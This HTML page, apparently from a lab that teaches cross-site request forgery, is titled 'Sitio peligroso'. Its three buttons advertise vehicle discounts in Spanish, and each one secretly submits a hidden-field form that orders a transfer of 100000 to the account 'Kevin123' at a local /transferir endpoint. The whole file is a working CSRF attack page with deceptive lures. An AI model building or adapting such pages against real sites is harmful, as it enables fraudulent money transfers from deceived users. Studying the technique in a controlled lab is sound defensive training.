<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sitio peligroso</title>
</head>

<body>

    <h1>Super ofertas</h1>

    <div class="container">
        <form action="http://localhost:5000/transferir" method="POST">
            <input type="hidden" name="destinatario" value="Kevin123" />
            <input type="hidden" name="monto" value="100000" />
            <button type="submit" value="Ver rebajas de precios de automóviles!">Acceder a rebajas en precios de
                automóviles!</button>
        </form>
        <form action="http://localhost:5000/transferir" method="POST">
            <input type="hidden" name="destinatario" value="Kevin123" />
            <input type="hidden" name="monto" value="100000" />
            <button type="submit" value="Ver rebajas de precios de automóviles!">Acceder a rebajas en precios de
                motocicletas!</button>
        </form>
        <form action="http://localhost:5000/transferir" method="POST">
            <input type="hidden" name="destinatario" value="Kevin123" />
            <input type="hidden" name="monto" value="100000" />
            <button type="submit" value="Ver rebajas de precios de automóviles!">Acceder a rebajas en precios de
                bicicletas!</button>
        </form>
    </div>


</body>

</html>